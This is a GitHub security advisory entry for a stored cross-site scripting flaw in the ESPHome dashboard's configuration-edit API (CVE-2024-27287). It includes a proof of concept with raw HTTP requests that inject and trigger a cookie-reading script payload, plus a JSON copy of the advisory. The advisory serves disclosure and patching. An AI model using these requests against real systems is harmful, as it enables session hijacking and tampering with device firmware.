GHSA-9P43-HJ5J-96H5

Vulnerability from github – Published: 2024-03-06 15:28 – Updated: 2024-03-06 15:28
VLAI?
Summary
esphome vulnerable to stored Cross-site Scripting in edit configuration file API
Details

Summary

Edit configuration file API in dashboard component of ESPHome version 2023.12.9 (command line installation and Home Assistant add-on) serves unsanitized data with “Content-Type: text/html; charset=UTF-8”, allowing remote authenticated user to inject arbitrary web script and exfiltrate session cookies via Cross-Site scripting (XSS).

Credits

Spike Reply Cybersecurity Teams

Details

It is possible for a malicious authenticated user to inject arbitrary Javascript in configuration files using a POST request to the /edit endpoint, the configuration parameter allows to specify the file to write.

To trigger the XSS vulnerability, the victim must visit the page /edit?configuration=[xss file].

PoC

To reproduce the issue, it is possible to perform a POST request to inject the payload:

request: POST /edit?configuration=xss.yaml HTTP/1.1 Host: localhost:6052 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/116.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: http://localhost:6052/ Connection: close Cookie: authenticated=[replace with valid cookie] Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Content-Length: 40

alert(document.cookie);

response: HTTP/1.1 200 OK Server: TornadoServer/6.3.3 Content-Type: text/html; charset=UTF-8 Date: Thu, 30 Nov 2023 11:02:27 GMT Content-Length: 0 Connection: close

And subsequently trigger the XSS with a GET request to the same endpoint:

request: GET /edit?configuration=xss.yaml HTTP/1.1 Host: localhost:6052 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/116.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: http://localhost:6052/ Connection: close Cookie: authenticated=2|1:0|10:1701341719|13:authenticated|4:eWVz|0907127d7274094cc5a2490b95becf5c11fd52b8c3ee3655d65fe9fda099108c Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Content-Length: 0

response: HTTP/1.1 200 OK Server: TornadoServer/6.3.3 Content-Type: text/html; charset=UTF-8 Date: Thu, 30 Nov 2023 11:04:12 GMT Etag: "ec6c9889f5c9a6c8e9d2d5e4ce1b1a85e6e7da2b" Content-Length: 40 Connection: close

alert(document.cookie);

Impact

Abusing this vulnerability a malicious actor could perform operations on the dashboard on the behalf of a logged user, access sensitive information, create, edit and delete configuration files and flash firmware on managed boards. In addition to this, cookies are not correctly secured, allowing the exfiltration of session cookie values.

Credits

Spike Reply Cybersecurity Team

Severity ?
6.5 (Medium)
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "esphome"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2023.12.9"
            },
            {
              "fixed": "2024.2.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-27287"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-03-06T15:28:21Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Summary\nEdit configuration file API in dashboard component of ESPHome version 2023.12.9 (command line installation and Home Assistant add-on) serves unsanitized data with \u201cContent-Type: text/html; charset=UTF-8\u201d, allowing remote authenticated user to inject arbitrary web script and exfiltrate session cookies via Cross-Site scripting (XSS).\n\n### Credits\nSpike Reply Cybersecurity Teams\n\n### Details\nIt is possible for a malicious authenticated user to inject arbitrary Javascript in configuration files using a POST request to the /edit endpoint, the configuration parameter allows to specify the file to write. \n\nTo trigger the XSS vulnerability, the victim must visit the page /edit?configuration=[xss file].\n\n### PoC\n\nTo reproduce the issue, it is possible to perform a POST request to inject the payload:\n\nrequest:\nPOST /edit?configuration=xss.yaml HTTP/1.1\nHost: localhost:6052\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/116.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nReferer: http://localhost:6052/\nConnection: close\nCookie: authenticated=[replace with valid cookie]\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nContent-Length: 40\n \n\u003cscript\u003ealert(document.cookie);\u003c/script\u003e\n\n__________________________\n\nresponse:\nHTTP/1.1 200 OK\nServer: TornadoServer/6.3.3\nContent-Type: text/html; charset=UTF-8\nDate: Thu, 30 Nov 2023 11:02:27 GMT\nContent-Length: 0\nConnection: close\n\nAnd subsequently trigger the XSS with a GET request to the same endpoint:\n\nrequest:\nGET /edit?configuration=xss.yaml HTTP/1.1\nHost: localhost:6052\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/116.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nReferer: http://localhost:6052/\nConnection: close\nCookie: authenticated=2|1:0|10:1701341719|13:authenticated|4:eWVz|0907127d7274094cc5a2490b95becf5c11fd52b8c3ee3655d65fe9fda099108c\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nContent-Length: 0\n\n________________________________\n\nresponse:\nHTTP/1.1 200 OK\nServer: TornadoServer/6.3.3\nContent-Type: text/html; charset=UTF-8\nDate: Thu, 30 Nov 2023 11:04:12 GMT\nEtag: \"ec6c9889f5c9a6c8e9d2d5e4ce1b1a85e6e7da2b\"\nContent-Length: 40\nConnection: close\n \n\u003cscript\u003ealert(document.cookie);\u003c/script\u003e\n\n\n### Impact\nAbusing this vulnerability a malicious actor could perform operations on the dashboard on the behalf of a logged user, access sensitive information, create, edit and delete configuration files and flash firmware on managed boards.\nIn addition to this, cookies are not correctly secured, allowing the exfiltration of session cookie values.\n\n### Credits\nSpike Reply Cybersecurity Team\n",
  "id": "GHSA-9p43-hj5j-96h5",
  "modified": "2024-03-06T15:28:21Z",
  "published": "2024-03-06T15:28:21Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/esphome/esphome/security/advisories/GHSA-9p43-hj5j-96h5"
    },
    {
      "type": "WEB",
      "url": "https://github.com/esphome/esphome/commit/37d2b3c7977a4ccbec59726ca7549cb776661455"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/esphome/esphome"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "esphome vulnerable to stored Cross-site Scripting in edit configuration file API"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.